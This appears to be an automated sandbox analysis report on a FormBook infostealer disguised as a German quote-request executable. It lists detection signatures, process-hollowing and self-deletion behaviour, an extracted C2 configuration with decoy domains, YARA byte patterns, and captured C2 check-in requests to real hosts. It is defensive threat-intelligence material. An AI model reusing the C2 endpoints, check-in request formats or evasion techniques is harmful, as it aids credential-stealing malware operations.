Create Interactive Tour

Windows Analysis Report
Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe

Overview

General Information

Sample Name:Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
Analysis ID:606176
MD5:1c9b3c703779b11b16de35b52e2fd3d2
SHA1:fd6a6cf3ed9e7b3fb5c722eb8c8be49c4e06c7e9
SHA256:884509a71f4c0a818866f49982a2f4a1146063f65cb05f4202bdf3eb422575b0
Tags:DEUexeFormbookgeo
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe" MD5: 1C9B3C703779B11B16DE35B52E2FD3D2)
    • Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe (PID: 6888 cmdline: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe MD5: 1C9B3C703779B11B16DE35B52E2FD3D2)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6592 cmdline: /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{
  "C2 list": [
    "www.cannonbrookes.online/g6k0/"
  ],
  "decoy": [
    "tour-peru-machupicchu.com",
    "hautebazaar.net",
    "southking.tech",
    "b148tlrnd09ustnnaku2721.com",
    "finlandnine.xyz",
    "nevalostrecords.com",
    "yberwomanshowcase.com",
    "fourfatcats.com",
    "pa66sujiao.com",
    "bodychile.com",
    "vireoenvironmentalllc.com",
    "williamhag.online",
    "tsctribe.com",
    "tenutoai.com",
    "10thring.com",
    "picturebookoriginals.com",
    "discord-gif.xyz",
    "benefitcarolina.com",
    "stellarsweats.com",
    "cr7tips.com",
    "studioimplicita.com",
    "aidenb.tech",
    "homeremodelingleads.com",
    "ocvcoins.com",
    "donwalin.com",
    "fogijjipv.xyz",
    "miniblueheelers.com",
    "tunnelvisionconference.com",
    "lumilentmed.com",
    "icicareers.com",
    "pretog.com",
    "skinmedic.club",
    "petswastepickup.com",
    "hombreobjeto.com",
    "scwrdctyewfrcdqu.cloud",
    "holdvfind.store",
    "changeswissmind.com",
    "sitejdfinancas.club",
    "shipmandesignz.com",
    "youcanstores.com",
    "pagchapman.top",
    "p8x.claims",
    "usps-postal-us.com",
    "goldenn.store",
    "makonigroup.com",
    "musicafe.tech",
    "thepanopticgroup.com",
    "revivesurgicals.xyz",
    "freakyhamsters.com",
    "sharpberth.com",
    "alibiaglet.pro",
    "yfguolu.com",
    "lem-headspa.com",
    "priorityvvorkforces.com",
    "tra4fficsearchtabspace.rest",
    "levelfivequaning.com",
    "86braith.com",
    "zhuangmengmeng.com",
    "bizzyagency.com",
    "hemperek.net",
    "terrierslovjt.xyz",
    "kompor-premium.online",
    "bajajfinservmutualfunds.com",
    "schonheitschirurg.online"
  ]
}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries
      SourceRuleDescriptionAuthorStrings
      2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 27 entries

          There are no malicious signatures, click here to show all signatures.

          Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, CommandLine: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, CommandLine|base64offset|contains: xn, Image: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, NewProcessName: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, OriginalFileName: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, ParentCommandLine: "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe" , ParentImage: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, ParentProcessId: 6736, ParentProcessName: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, ProcessCommandLine: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, ProcessId: 6888, ProcessName: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6556, ProcessName: conhost.exe
          Timestamp:04/09/22-09:13:28.877144
          SID:2031453
          Source Port:49789
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:28.877144
          SID:2031449
          Source Port:49789
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:28.877144
          SID:2031412
          Source Port:49789
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:39.103868
          SID:2031453
          Source Port:49791
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:39.103868
          SID:2031449
          Source Port:49791
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:39.103868
          SID:2031412
          Source Port:49791
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:39.151034
          SID:1201
          Source Port:80
          Destination Port:49791
          Protocol:TCP
          Classtype:Attempted Information Leak
          Timestamp:04/09/22-09:13:49.792502
          SID:2031453
          Source Port:49795
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:49.792502
          SID:2031449
          Source Port:49795
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/09/22-09:13:49.792502
          SID:2031412
          Source Port:49795
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cannonbrookes.online/g6k0/"], "decoy": ["tour-peru-machupicchu.com", "hautebazaar.net", "southking.tech", "b148tlrnd09ustnnaku2721.com", "finlandnine.xyz", "nevalostrecords.com", "yberwomanshowcase.com", "fourfatcats.com", "pa66sujiao.com", "bodychile.com", "vireoenvironmentalllc.com", "williamhag.online", "tsctribe.com", "tenutoai.com", "10thring.com", "picturebookoriginals.com", "discord-gif.xyz", "benefitcarolina.com", "stellarsweats.com", "cr7tips.com", "studioimplicita.com", "aidenb.tech", "homeremodelingleads.com", "ocvcoins.com", "donwalin.com", "fogijjipv.xyz", "miniblueheelers.com", "tunnelvisionconference.com", "lumilentmed.com", "icicareers.com", "pretog.com", "skinmedic.club", "petswastepickup.com", "hombreobjeto.com", "scwrdctyewfrcdqu.cloud", "holdvfind.store", "changeswissmind.com", "sitejdfinancas.club", "shipmandesignz.com", "youcanstores.com", "pagchapman.top", "p8x.claims", "usps-postal-us.com", "goldenn.store", "makonigroup.com", "musicafe.tech", "thepanopticgroup.com", "revivesurgicals.xyz", "freakyhamsters.com", "sharpberth.com", "alibiaglet.pro", "yfguolu.com", "lem-headspa.com", "priorityvvorkforces.com", "tra4fficsearchtabspace.rest", "levelfivequaning.com", "86braith.com", "zhuangmengmeng.com", "bizzyagency.com", "hemperek.net", "terrierslovjt.xyz", "kompor-premium.online", "bajajfinservmutualfunds.com", "schonheitschirurg.online"]}
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeVirustotal: Detection: 31%Perma Link
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeMetadefender: Detection: 22%Perma Link
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeReversingLabs: Detection: 61%
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.youcanstores.com/g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0rAvira URL Cloud: Label: malware
          Source: http://www.williamhag.online/g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0rAvira URL Cloud: Label: phishing
          Source: www.cannonbrookes.online/g6k0/Avira URL Cloud: Label: phishing
          Source: http://www.terrierslovjt.xyz/g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0rAvira URL Cloud: Label: phishing
          Source: youcanstores.comVirustotal: Detection: 8%Perma Link
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeJoe Sandbox ML: detected
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345224756.0000000000E09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345224756.0000000000E09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345369869.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345626782.000000000135F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526451431.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.344894466.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526983133.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345369869.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345626782.000000000135F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000D.00000002.526451431.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.344894466.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526983133.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 4x nop then pop ebx

          Networking

          barindex
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 104.19.178.121:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 104.19.178.121:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 104.19.178.121:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 185.76.64.173:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 185.76.64.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 185.76.64.173:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49795 -> 54.161.222.85:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49795 -> 54.161.222.85:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49795 -> 54.161.222.85:80
          Source: C:\Windows\explorer.exeDomain query: www.terrierslovjt.xyz
          Source: C:\Windows\explorer.exeDomain query: www.williamhag.online
          Source: C:\Windows\explorer.exeDomain query: www.tra4fficsearchtabspace.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 185.76.64.173 80
          Source: C:\Windows\explorer.exeDomain query: www.schonheitschirurg.online
          Source: C:\Windows\explorer.exeNetwork Connect: 104.19.178.121 80
          Source: C:\Windows\explorer.exeDomain query: www.hautebazaar.net
          Source: C:\Windows\explorer.exeDomain query: www.youcanstores.com
          Source: C:\Windows\explorer.exeDomain query: www.tunnelvisionconference.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.250.121.17 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.111.89.175 80
          Source: C:\Windows\explorer.exeDomain query: www.10thring.com
          Source: C:\Windows\explorer.exeDNS query: www.terrierslovjt.xyz
          Source: Malware configuration extractorURLs: www.cannonbrookes.online/g6k0/
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: MISSDOMAINSE MISSDOMAINSE
          Source: global trafficHTTP traffic detected: GET /g6k0/?vDKd7h=9rjLcdHx-0r&oT=00OPvUDJVYQxzP7YGwKxSk8Z59zdNvCY+dfImaOG8hbO22YMZXpup+qu2+4V2Jgm5VQN HTTP/1.1Host: www.tunnelvisionconference.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.terrierslovjt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.10thring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.youcanstores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0r HTTP/1.1Host: www.williamhag.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.212 198.54.117.212
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Sat, 09 Apr 2022 07:13:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 